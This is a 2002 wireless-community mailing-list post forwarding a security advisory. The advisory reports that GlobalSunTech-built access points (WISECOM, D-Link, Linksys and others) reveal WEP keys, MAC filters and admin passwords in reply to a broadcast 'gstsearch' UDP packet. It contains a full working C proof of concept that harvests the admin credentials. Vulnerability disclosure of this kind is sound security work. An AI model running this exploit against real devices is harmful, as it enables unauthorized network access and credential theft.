[MLB-WIRELESS] [SECURITY] KHAMSIN Security News 2002-11-01 0001 ULO - Wireless A ccesspoints disclose wep keys, password and mac filter
Tyson.Clugg at csiro.au
Tyson.Clugg at csiro.au
Wed Nov 6 15:54:06 EST 2002
Hi all,
Security alert forwarded FYI.
Tyson.
PS: Does the idea of a separate moderated mailing list for security
announcements sound like a good idea? If you think so, hit reply and with
enough support, I'll setup "security at wireless.org.au" for this task.
___________________________
Tyson at wireless.org.au
Treasurer at wireless.org.au
B/H: +61 3 9545 8117
A/H: +61 3 9887 0117
Mob: +61 4 0889 7662
___________________________
-----Original Message-----
From: Tom Knienieder [mailto:knienieder at khamsin.ch]
Sent: Monday, 4 November 2002 12:43 AM
To: bugtraq at securityfocus.com
Subject: Accesspoints disclose wep keys, password and mac filter (fwd)
KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------
Title
-----
Accesspoints disclose wep keys, password and mac filter
Date
----
2002-11-01
Description:
------------
GlobalSunTech develops Wireless Access Points for OEM customers like
Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T
during the setup phase showed a security problem.
Sending a broadcast packet to UDP port 27155 containing the string
"gstsearch" causes the accesspoint to return wep keys, mac filter and
admin password. This happens on the WLAN Side and on the LAN Side.
Systems Affected
----------------
Vulnerable, tested, OEM Version from GlobalSunTech:
WISECOM GL2422AP-0T
Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
D-Link DWL-900AP+ B1 version 2.1 and 2.2
ALLOY GL-2422AP-S
EUSSO GL2422-AP
LINKSYS WAP11-V2.2
Proof of concept:
-----------------
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");
val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}
ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}
ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
printf("Type : %s\n",ans->type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);
return 0;
}
Disclaimer
-----------
This advisory does not claim to be complete or to be usable for
any purpose. Especially information on the vulnerable systems may
be inaccurate or wrong. Possibly supplied exploit code is not to
be used for malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.
http://www.khamsin.ch
To unsubscribe: send mail to majordomo at wireless.org.au
with "unsubscribe melbwireless" in the body of the message
More information about the Melbwireless
mailing list